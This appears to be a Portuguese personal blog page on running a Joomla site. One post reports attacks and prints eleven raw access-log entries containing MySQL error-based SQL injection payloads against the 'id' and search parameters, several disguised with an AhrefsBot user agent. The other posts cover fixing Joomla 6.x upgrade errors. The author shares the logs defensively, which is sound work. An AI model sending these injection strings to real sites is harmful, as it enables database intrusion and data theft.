Os artigos mais lidos de 2025

Ataques no Joomla

Details
Written by: Helio Loureiro
Category: Joomla
Hits: 40

Tenho recebidos vários ataques. E hoje eu percebi que um conseguiu passar pro cache do site.


{
  "time": "2026-04-27T02:26:01.602Z",
  "process": "338026",
  "filename": "/loureiro/index.php",
  "remoteIP": "104.209.8.138",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120'%20AND%20,(/*!50000SELECT*/9786/*!50000FROM*/(/*!50000SELECT*//*!50000COUNT*/(*),/*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9786=9786,1))),'~',FLOOR(RAND(0)*2))x/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS/*!50000GROUP*//*!50000BY*/x)a)--%20-&start=481&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
  "referer": "-"
}
{
  "time": "2026-04-27T03:06:29.334Z",
  "process": "547775",
  "filename": "/loureiro/index.php",
  "remoteIP": "198.244.240.225",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T04:13:48.938Z",
  "process": "1719898",
  "filename": "/loureiro/index.php",
  "remoteIP": "5.39.109.174",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120'%20AND%20,(/*!50000SELECT*/9786/*!50000FROM*/(/*!50000SELECT*//*!50000COUNT*/(*),/*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9786=9786,1))),'~',FLOOR(RAND(0)*2))x/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS/*!50000GROUP*//*!50000BY*/x)a)--%20-&task=view&start=26",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T04:38:04.280Z",
  "process": "1364863",
  "filename": "/loureiro/index.php",
  "remoteIP": "170.79.185.158",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=169&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36",
  "referer": "https://helio.loureiro.eng.br/index.php?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=143&task=view"
}
{
  "time": "2026-04-27T04:38:20.526Z",
  "process": "33454",
  "filename": "/loureiro/index.php",
  "remoteIP": "217.199.226.8",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=169&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
  "referer": "https://helio.loureiro.eng.br/index.php?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=143&task=view"
}
{
  "time": "2026-04-27T05:08:21.162Z",
  "process": "459943",
  "filename": "/loureiro/index.php",
  "remoteIP": "51.195.183.127",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view&start=52",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T05:12:55.699Z",
  "process": "243586",
  "filename": "/loureiro/index.php",
  "remoteIP": "51.89.129.94",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view&start=377",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T05:25:00.517Z",
  "process": "406363",
  "filename": "/loureiro/index.php",
  "remoteIP": "198.244.226.168",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view&start=364",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T07:18:24.576Z",
  "process": "287085",
  "filename": "/loureiro/index.php",
  "remoteIP": "198.244.183.180",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120'%20AND%20,(/*!50000SELECT*/9786/*!50000FROM*/(/*!50000SELECT*//*!50000COUNT*/(*),/*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9786=9786,1))),'~',FLOOR(RAND(0)*2))x/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS/*!50000GROUP*//*!50000BY*/x)a)--%20-&task=view&start=117",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T07:40:43.198Z",
  "process": "155356",
  "filename": "/loureiro/index.php",
  "remoteIP": "54.38.147.143",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php/component/finder/search",
  "query": "?q=1/*!50000AND*/(/*!50000SELECT*/2*(IF((/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(4119=4119,1))),'~','x'))s),/**/8446744073709551610,/**/8446744073709551610)))%20PROCEDURE%20ANALYSE(6670,1)--%20-&Itemid=101",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}
{
  "time": "2026-04-27T07:58:26.393Z",
  "process": "530181",
  "filename": "/loureiro/index.php",
  "remoteIP": "54.38.147.108",
  "host": "helio.loureiro.eng.br",
  "request": "/index.php",
  "query": "?id=120'))/*!50000AND*/(/*!50000SELECT*/2*(IF((/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(7089=7089,1))),'~','x'))s),/**/8446744073709551610,/**/8446744073709551610)))%20AND%20(('q3G8xIn9'%20LIKE%20'q3G8xIn9&task=view",
  "method": "GET",
  "status": "200",
  "userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
  "referer": "-"
}

Diminui o tempo de cache pra ver se isso segura a onda.  Mas provavelmente vou precisar configurar meu fail2ban pra esses regex.

Joomla 6.1 ainda com alguns soluços

Details
Written by: Helio Loureiro
Category: Joomla
Hits: 91

Mexendo aqui e ali, ainda aperecem alguns bugs no meu Joomla 6.1.  O último é da imagem abaixo:

"Failed opening required '/var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapther.php' (include_path=´.:/usr/share/php')"

Encontrei uma referênci nesse link:

https://www.blog.nestict.com/fixing-joomla-error-failed-opening-required-com_finder-helpers-indexer-adapter-php-the-real-cause-and-solution/

Apesar de comentar sobre o mesmo erro, ainda assim não é o mesmo problema.  Não tenho o tal plugin.

O que fiz no momento foi buscar onde esse arquivo é referenciado:


$ rg "com_finder/helpers/indexer/adapter.php" /var/www/loureiro.eng.br
/var/www/loureiro.eng.br/plugins/finder/weblinks/weblinks.php
15:require_once JPATH_ADMINISTRATOR . '/components/com_finder/helpers/indexer/adapter.php';

/var/www/loureiro.eng.br/administrator/components/com_akeebabackup/backup/akeeba.backend.id-20251212-144959-340716.log.php
24599:DEBUG   |20251212 14:50:16|-- Adding administrator/components/com_finder/helpers/indexer/adapter.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php)

/var/www/loureiro.eng.br/administrator/components/com_akeebabackup/backup/akeeba.backend.id-20251228-175859-132763.log.php
24601:DEBUG   |20251228 17:59:17|-- Adding administrator/components/com_finder/helpers/indexer/adapter.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php)

/var/www/loureiro.eng.br/administrator/components/com_admin/script.php
502:            //'/administrator/components/com_finder/helpers/indexer/adapter.php',

Achei uma referência de adapter.php com component pra admin:


$ fd adapter.php /var/www/loureiro.eng.br | grep administrator | grep components | grep com_finder
/var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php
/var/www/loureiro.eng.br/administrator/components/com_finder/src/Indexer/Adapter.php
/var/www/loureiro.eng.br/administrator/components/com_finder/src/Indexer/DebugAdapter.php

O primeiro ítem eu criei manualmente pra tentar coibir o erro.  Dentro não tem nada.  E não deu certo.

Então usei a segunda referência.  Comentei a linha e apontei pra onde existe um Adapter.php:


$ rg -A 1 "com_finder/helpers/indexer/adapter.php" /var/www/loureiro.eng.br
/var/www/loureiro.eng.br/plugins/finder/weblinks/weblinks.php
15://require_once JPATH_ADMINISTRATOR . '/components/com_finder/helpers/indexer/adapter.php';
16-require_once JPATH_ADMINISTRATOR . '/components/com_finder/src/Indexer/Adapter.php';

/var/www/loureiro.eng.br/administrator/components/com_akeebabackup/backup/akeeba.backend.id-20251212-144959-340716.log.php
24599:DEBUG   |20251212 14:50:16|-- Adding administrator/components/com_finder/helpers/indexer/adapter.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php)
24600-DEBUG   |20251212 14:50:16|-- Adding administrator/components/com_finder/helpers/indexer/helper.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/helper.php)

/var/www/loureiro.eng.br/administrator/components/com_akeebabackup/backup/akeeba.backend.id-20251228-175859-132763.log.php
24601:DEBUG   |20251228 17:59:17|-- Adding administrator/components/com_finder/helpers/indexer/adapter.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/adapter.php)
24602-DEBUG   |20251228 17:59:17|-- Adding administrator/components/com_finder/helpers/indexer/helper.php to archive (source: /var/www/loureiro.eng.br/administrator/components/com_finder/helpers/indexer/helper.php)

/var/www/loureiro.eng.br/administrator/components/com_admin/script.php
502:            //'/administrator/components/com_finder/helpers/indexer/adapter.php',
503-        '/administrator/components/com_finder/src/Indexer/Adapter.php',

O erro sumiu.

Por enquanto...

Update: é... não deu certo.  Ao tentar indexar pela busca rápida... xablau!

E Joomla 6.0.3 instalado

Details
Written by: Helio Loureiro
Category: Joomla
Hits: 196

joomla broken 2 2026 02 23 16 29

Depois do erro do upgrade pro Joomla 6.0.3 descrito em deu ruim com o Joomla 6.0.2, eu meio que deixei pra lá esperando algo como sair o 6.0.4 que talvez resolvesse isso.  Mas hoje eu decidi abrir um bug report.

Botei o site em mode debug e rodei o upgrade.  Peguei o erro e fui pro site registrar o bug.

A primeira tarefa foi ver se já existia bug aberto.  E encontrei um:

https://issues.joomla.org/tracker/joomla-cms/31330

No bug é comentado que falta suporte ao curl.

Então conectei no servidor e instaleio php8.4-curl.  Rodei o upgrade e... falhou.

Claro!  PHP exige reiniciar o servidor web, que é Apache.

Reiniciei e... pimba!  Estamos na versão 6.0.3.

E deu ruim com o Joomla 6.0.2

Details
Written by: Helio Loureiro
Category: Joomla
Hits: 191

Quebrou algum treco.  E não faz mais upgrade.

joomla broken 2026 02 23 16 28

Aparece certo na tela de apresentação de administração.  Mas na hora de fazer o upgrade em si...

joomla broken 2 2026 02 23 16 29

Não tenho muito o que fazer e vou aguardar a próxima versão.

E vamos pro Joomla 6.0.2

Details
Written by: Helio Loureiro
Category: Joomla
Hits: 314

joomla 6.0.2 2026 01 12 16 21

Se saiu, então temos de atualizar.

Claro que não mandei o full package.  Fiz com o de upgrade.

Em tempo: descobri alguns arquivos que não foram bem sucedidos durante o upgrade.  Fui olhar e o dono estava para... root.  Foram corrigidos.

  1. Joomla atualizado pro 6.0.1
  2. Colorindo os códigos do site com highlight.js
  3. Atualizando os artigos mais lidos
  4. Começando 2024 de pé direito

Page 1 of 3

Estatísticas

  • Users 2
  • Articles 506
  • Articles View Hits 3643218

Imagem aleatória